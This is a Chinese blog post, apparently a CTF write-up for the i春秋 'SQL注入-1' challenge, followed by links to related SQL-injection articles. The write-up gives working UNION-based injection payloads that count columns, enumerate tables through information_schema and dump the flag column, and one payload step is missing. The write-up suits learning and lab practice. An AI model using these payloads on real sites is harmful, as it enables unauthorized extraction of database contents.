i春秋之SQL注入-1

最新推荐文章于 2024-05-17 08:39:11 发布
最新推荐文章于 2024-05-17 08:39:11 发布
阅读量712 收藏
点赞数
分类专栏: CTFのWriteUp 文章标签: CTF i春秋
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2872253606/article/details/123956043
版权

目录

注入点判断

字段判断

爆表

注入点判断

不难发现修改GET传参中id的值页面就不一样,而且当id=1' and 1=2时页面不正常

所以id就是注入点

字段判断

构建payload

inurl?id=1' order by x --+

当x=4的时候页面不正常,说明字段数为3,而且当id=4的时候页面也不正常

接着用联合注入,构建payload

inurl?id=-1' union select 1,2,3 --+

可以看到2和3的位置有回显

爆表

看一下当前数据库里的所有表名,构建payload

inurl?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database() --+

可以看到有两表,接着看一下fl4g这个表里的字段有啥,构建payload

好了,知道字段名跟表名,我们来看一下字段里有啥,构建payload

inurl?id=-1' union select 1,2,group_concat(fllllag) from fl4g --+

 

 

拿到flag

金 帛
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
i 春秋 CTF训练营 web——SQL注入 1(字符型注入)(手动注入)
AAAAAAAAAAAA66的博客
11-30 2544
这道题可以直接使用sqlmap 直接跑出。 下文介绍的是手注: 本文用到了搜狐插件hackbar,(使用效果与直接在url栏输入参数相同) 题目(得知是注入题) 判断是否为数字型 http://eci-2ze7889omx49vxiu5ma0.cloudeci1.ichunqiu.com/index.php?id=1 and 1=1 http://eci-2ze7889omx49vxiu5ma0.cloudeci1.ichunqiu.com/index.php?id=1 and 1.
春秋云境:CVE-2022-32991(SQL注入
m0_65712192的博客
04-12 1622
该CMS的welcome.php中存在SQL注入攻击。
SQL注入介绍_sql注入id=-1含义(1)
最新发布
2401_84281720的博客
05-17 1097
id=-1’ union select 1,要查询的字段名1,要查询的字段名2 from 要查询的表 //查询一年字段中的内容?id=-1’ union select 1,unhex(hex(username)),unhex(hex(password)),4 from admin //若内容无法显示,则unhex编码。
SQL注入-01】SQL语句基础及SQL注入漏洞原理及分类
m0_64378913的博客
04-23 5642
目录1 SQL注入概述1.1 SQL注入简介1.2 SQL注入原理(掌握)1.3 SQL注入漏洞的危害(掌握)2 SQL注入漏洞分类2.1 注入位置分类(掌握)2.2 注入数据类型分类(掌握)2.3 注入手法分类(掌握)3 SQL语句基础3.1 简介3.2 注释3.3 MySQL 元数据库 information_schema 内容简介3.4 MySQL 常用函数4 总结参考文献 1 SQL注入概述 1.1 SQL注入简介 定义:SQL注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传
[第一章 web入门]SQL注入-1
qq_51802152的博客
12-11 403
[第一章 web入门]SQL注入-1
【网络安全---sql注入(1)】你知道什么是SQL注入吗?知道如何通过SQL注入来控制目标服务器吗?一篇文章教你sql注入漏洞的原理及方法
m0_67844671的博客
09-19 1032
SQL注入漏洞详解。包括原理,分类比如数字型,字符型,搜索型,xx型,宽字节注入,报错注入,盲注,有无回显等,各种注入payload以及产生原因等等
10-sql注入-mysql注入1
08-03
1. **SQL注入原理**: 当应用程序将用户提供的数据直接拼接到SQL查询中而不进行适当验证时,就可能发生SQL注入。攻击者可以通过构造特定的输入,使SQL查询执行非预期的操作,如读取、修改或删除敏感数据,甚至获取...
09-sql注入-mssql1
08-03
SQL注入是一种常见的安全漏洞,攻击者通过输入恶意SQL语句来获取未授权的数据或执行恶意操作。针对SQL Server,攻击者可能使用的注入技术包括: 1. 判断是否存在注入漏洞。 2. 确定数据库类型。 3. 猜测表名和字段。...
SQL注入-xiabee1
08-03
1.1 安装靶场 1.2 手工注入 1.2.1 联合查询注入 1.2.2 报错注入 1.3 源码审计
SQL注入-概述-ppt.pptx
10-27
SQL相关资料
SQL注入-防范-ppt.pptx
10-27
SQL相关资料
浅谈SQL注入中的-1‘ union select 1,2,3#
qq_23667585的博客
10-09 7953
超详细的介绍了SQL注入语句中的 -1' union select 1,2,3# 的含义
【BUCTF】[第一章 web入门]SQL注入-1——手工注入全解析
自知.的博客
03-11 351
BUCTF[第一章 web入门]SQL注入-1之手工注入全解析,1. 根据注入位置数据类型将sql注入分类 2. 利用order判断字段数 order by x(数字) 正常与错误的正常值 正确网页正常显示,错误网页报错 ?id=1' order by 3 3. 利用 union select 联合查询 将id值设置成不成立,即可探测到可利用的字段数 ?id=-1 union select 1,2,3 4. 利用函数database(),user(),version()可以得到所探测数据库的数据库名、用户名
i春秋之SQL(详细WP)
金 帛的博客
02-22 1521
i春秋webWP
i春秋web-SQL(基础绕过注入)
Sea_Sand息禅
05-21 743
很简单的一道注入,没有任何闭合,直接就是个整数的注入 id=1 order by 1 报错:inj code! 对order进行处理 1)id=1 or<>der by 1 报错:inj code! 2)id=1 ord<>er by 1 页面正常 id=-1 union sel<>ect 1,2,3 页面显示2,说明作用...
第一次CTF【后台登录、简单的sql注入之、简单的sql注入之2、猫抓老鼠、i春秋 文件上传】
weixin_44722125的博客
05-14 2713
后台登录 http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 根据md5($password,true)最后要得到原始二进制字符串,要含有or ,在or的两边要有单引号,使它变成password=‘xxx’ or 'xxx’的形式,那么可以根据32位16进制的字符串来查找‘or’对应的16进制是276f7227,所以我们的目标就是要找一个字符串取3...
简单的sql注入1-3详解及相关阅读(实验吧)
zhy的博客
12-29 2220
题外话:更多关于信息安全、网络技术方面的东西,可以参考我的博客,也许你能找到你想看的? https://www.xiaozzz.xyz/ 1 简单的Sql注入 类型:sql注入 题目链接: http://www.shiyanbar.com/ctf/1875 解题过程: 打开页面看到一个输入框和提交,先尝试输入一些简单的东西,发现输入1 2 3都是有结果的,输入4之后没有结果。 按照...
SQL注入实战系列之sqli靶场第一关
VVzv的博客
08-27 2129
Sqli-less1: 打开sqli环境第一关(Less-1): 在链接Less-1/后面添加?id=1,然后回车即可; 添加?id=1后发现有了新的内容,在id=1后面加个单引号(')查看返回的内容; 发现返回了SQL语句的报错信息,从这个界面报错中可以得知这里是存在注入(现实中基本不会返回信息,这个我们将在后面接触),此处的id参数满足注入攻击的两个条件,id的参数用户可以控制,并且这个...
SQL注入实战————1、MySQL手工注入实战
热门推荐
Fly_鹏程万里
05-06 1万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! SQL注入实战 靶场地址:http://219.153.49.228:48204/show.php?id=MQ== 首先可以看到该URL中存在一个参数“MQ==”,从参...
sql注入-pikachu靶场
10-13
SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过构造恶意的SQL语句来获取或篡改数据库中的数据。在Pikachu靶场中,可以通过注入恶意的SQL语句来获取管理员账户的密码。具体步骤如下: 1. 在登录页面输入用户名...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金 帛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值